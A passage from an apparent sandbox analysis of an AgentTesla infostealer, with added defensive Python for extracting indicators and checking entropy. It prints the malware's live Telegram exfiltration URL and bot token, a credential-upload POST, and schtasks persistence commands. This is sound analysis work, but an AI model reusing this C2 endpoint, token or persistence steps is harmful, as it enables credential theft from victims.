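The rows above give two views of the same C2 channel: the Bot API URL sitting in the memory of all three process images, and the actual multipart POST to /sendDocument over TLS to 149.154.167.220. The following is an added example, not part of the Joe Sandbox report and not the sample's own code: a small Python helper that pulls Telegram bot tokens out of a memory-strings dump, derives the URLs worth hunting for, and then applies two rules to egress-proxy records: a broad one (any POST to a Bot API send* method) and a narrow one (a POST that uses a token recovered from the dump). The proxy record layout, the timestamps and the third bot token are constructed for the example; the memory strings and the sendDocument POST are taken from the rows above. The secret-length range in the regex is an assumption chosen to be loose rather than an exact Bot API specification.

```python
import re
from dataclasses import dataclass

# Bot API tokens have the form "<numeric bot id>:<secret>". AgentTesla stores the whole
# "https://api.telegram.org/bot<token>/" prefix and appends the method name at run time.
# The secret length range is an assumption, kept loose so minor format changes still match.
TOKEN_RE = re.compile(r"bot(\d{6,12}):([A-Za-z0-9_-]{30,50})")
EXFIL_RE = re.compile(r"/bot(\d{6,12}):([A-Za-z0-9_-]{30,50})/(sendDocument|sendMessage|sendPhoto)\b")


@dataclass(frozen=True)
class TelegramBotIoc:
    bot_id: str
    secret: str

    @property
    def base_url(self) -> str:
        return f"https://api.telegram.org/bot{self.bot_id}:{self.secret}/"

    def hunting_urls(self) -> list:
        # sendDocument carries the zipped credential archive, sendMessage the text beacons
        return [self.base_url + m for m in ("sendDocument", "sendMessage")]


def extract_bot_tokens(strings) -> set:
    """Unique bot tokens found in strings dumped from process memory (one string per element)."""
    return {TelegramBotIoc(b, s) for line in strings for b, s in TOKEN_RE.findall(line)}


def is_telegram_exfil(log_line: str) -> bool:
    """Broad rule: any POST to a Bot API send* method seen at the egress proxy.
    Constructed record layout: '<timestamp> <client ip> <method> <url> <status> <bytes>'."""
    parts = log_line.split()
    if len(parts) < 4 or parts[2].upper() != "POST":
        return False
    url = parts[3]
    return "api.telegram.org/" in url and EXFIL_RE.search(url) is not None


def known_token_used(iocs, log_line: str) -> bool:
    """Narrow rule: the POST uses a token recovered from the dump, so it is this sample, not some chat bot."""
    m = EXFIL_RE.search(log_line)
    return m is not None and TelegramBotIoc(m.group(1), m.group(2)) in iocs


# Constructed input: memory strings copied from the report rows above, plus the truncated fragment
MEMORY_STRINGS = [
    "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/",
    "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument",
    "https://api.telegram.org4",
]

# Constructed proxy records: the report's sendDocument POST, an unrelated GET, and a POST by some other bot
PROXY_LOG = [
    "2022-11-28T10:02:11Z 192.168.2.3 POST https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument 200 1006",
    "2022-11-28T10:02:12Z 192.168.2.3 GET https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip 200 12",
    "2022-11-28T10:03:00Z 192.168.2.7 POST https://api.telegram.org/bot1234567890:" + "A" * 35 + "/sendMessage 200 80",
]


def triage():
    iocs = extract_bot_tokens(MEMORY_STRINGS)
    hits = [rec for rec in PROXY_LOG if is_telegram_exfil(rec)]
    confirmed = [rec for rec in hits if known_token_used(iocs, rec)]
    return iocs, hits, confirmed


if __name__ == "__main__":
    iocs, hits, confirmed = triage()
    for ioc in iocs:
        print("bot id", ioc.bot_id, "hunt for", ioc.hunting_urls())
    print(len(hits), "Bot API uploads seen,", len(confirmed), "using the recovered token")
```

The broad rule will also fire on legitimate Telegram bots in the estate, so treat it as a hunting query; the narrow rule, keyed on the token from the dump, is the one worth an alert. Because the sample talks TLS 1.2 to api.telegram.org, the path is only visible where TLS is terminated or at the host; otherwise the DNS query and the connection to 149.154.167.220:443 are what remains.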

                System Summary

                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.shipping docs.exe.400000.0.unpack, <PrivateImplementationDetails>{3C2C41D0-332C-4962-9787-6AE70BED21B1}/373B1236-2AE2-49F0-9CFA-D6A6068282F0.cs | Large array initialization: .cctor: array initializer size 10969
                Source: shipping docs.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: VMqTMMD.exe PID: 1280, type: MEMORYSTR | Matched rule: webshell_jsp_generic_base64 date = 2021/01/24, author = Arnim Rupp, description = Generic JSP webshell with base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 1b916afdd415dfa4e77cecf47321fd676ba2184d
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_00B7E2D8
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_00B7E2C8
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_00B7BFC4
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04483635
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04480040
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_044813D0
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04485C18
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04481658
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04481668
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04486628
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04480800
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04480006
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04480810
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_044810A1
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_044810B0
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_044813C1
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04A465B8
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 0_2_04A465A9
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_02DFFA00
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_02DF6C00
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F7E1A
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F8818
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F0040
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F0910
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F29F8
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F0040
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F1850
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F7010
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066FA8B8
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F4168
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F89A0
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F6FBD
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066FCC28
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F4018
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_0684F240
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_0684C7C8
                Source: shipping docs.exe, 00000000.00000002.265751138.00000000024F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000002.282085594.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
                Source: shipping docs.exe, 00000000.00000000.236877884.00000000001D6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameV3VSkFfg.exe8 vs shipping docs.exe
                Source: shipping docs.exe, 00000003.00000002.503928846.0000000000DD8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs shipping docs.exe
                Source: shipping docs.exe, 00000003.00000000.262634318.0000000000438000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8c0e5951-f0e7-4ebf-a643-3c2760ac7891.exe4 vs shipping docs.exe
                Source: shipping docs.exe | Binary or memory string: OriginalFilenameV3VSkFfg.exe8 vs shipping docs.exe
                Source: shipping docs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: yVGAJfiVEvtg.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: VMqTMMD.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: shipping docs.exe | ReversingLabs: Detection: 73%
                Source: shipping docs.exe | Virustotal: Detection: 47%
                Source: C:\Users\user\Desktop\shipping docs.exe | File read: C:\Users\user\Desktop\shipping docs.exe
                Source: shipping docs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\shipping docs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\shipping docs.exe C:\Users\user\Desktop\shipping docs.exe
                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Users\user\Desktop\shipping docs.exe {path}
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Users\user\Desktop\shipping docs.exe {path}
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
                Source: C:\Users\user\Desktop\shipping docs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exe | File created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                Source: C:\Users\user\Desktop\shipping docs.exe | File created: C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/9@3/2
                Source: C:\Users\user\Desktop\shipping docs.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: shipping docs.exe, 00000003.00000002.533196722.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.536517685.000000000345B000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.533441099.00000000031AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: shipping docs.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\shipping docs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\shipping docs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_01
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Mutant created: \Sessions\1\BaseNamedObjects\FlPBfsykXUODZXqmIBIomiteD
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_01
                Source: 3.0.shipping docs.exe.400000.0.unpack, A/f2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.shipping docs.exe.400000.0.unpack, A/f2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\shipping docs.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\shipping docs.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\shipping docs.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\shipping docs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: shipping docs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: shipping docs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_02DF0007 push ecx; retf 3_2_02DF0042
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_02DF0430 push ecx; retf 3_2_02DF0446
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F3692 push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F3701 push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061FE767 push es; ret 3_2_061FE868
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F3448 push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F34CF push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F7CF0 push es; ret 3_2_061F7D00
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F353F push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F35AD push es; iretd 3_2_061F3B3C
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_061F1910 push es; ret 3_2_061F1920
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066FA8B8 push cs; retn 066Fh 3_2_066FC819
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066F9FF8 pushfd ; retf 065Fh 3_2_066FA08D
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_066FC8DE push es; retf 3_2_066FC928
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_06849AE1 push es; ret 3_2_06849AF0
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_06844387 push edi; retn 0000h 3_2_06844389
                Source: initial sample | Static PE information: section name: .text entropy: 7.898839095668671
                Source: initial sample | Static PE information: section name: .text entropy: 7.898839095668671
                Source: initial sample | Static PE information: section name: .text entropy: 7.898839095668671
                Source: C:\Users\user\Desktop\shipping docs.exe | File created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                Source: C:\Users\user\Desktop\shipping docs.exe | File created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
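Two of the static indicators in this summary are cheap to reproduce without the sandbox: the .text section entropy of 7.8988 (a compiled section that is nearly incompressible, i.e. a packed or encrypted payload) and the OriginalFilename values (MajorRevision.exe, V3VSkFfg.exe, a GUID-named .exe) that disagree with the name the file was delivered under. The following is an added example, not part of the report and not the sample's own code: a pure-Python triage helper that computes Shannon entropy of a section and scans a buffer for the UTF-16LE OriginalFilename entries of a version resource. The version-resource layout used to build the sample buffer is a simplified stand-in (key, NUL, alignment padding, value, NUL), the 7.0 packed threshold is a common heuristic rather than a fixed rule, and the "section" is 64 KiB of seeded pseudo-random bytes standing in for the real .text; all of that is constructed for the example.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(entropy: float, threshold: float = 7.0) -> bool:
    # Plain compiled code usually lands well below 7; a .text section near 8 (the report's 7.8988)
    # is compressed or encrypted content. The threshold is a heuristic, not a hard rule.
    return entropy >= threshold


KEY = "OriginalFilename".encode("utf-16-le")


def original_filenames(buf: bytes) -> list:
    """Every OriginalFilename value in the UTF-16LE version-resource strings of buf."""
    names, pos = [], 0
    while True:
        i = buf.find(KEY, pos)
        if i < 0:
            return names
        j = i + len(KEY)
        while j + 1 < len(buf) and buf[j:j + 2] == b"\x00\x00":      # key terminator + alignment padding
            j += 2
        end = j
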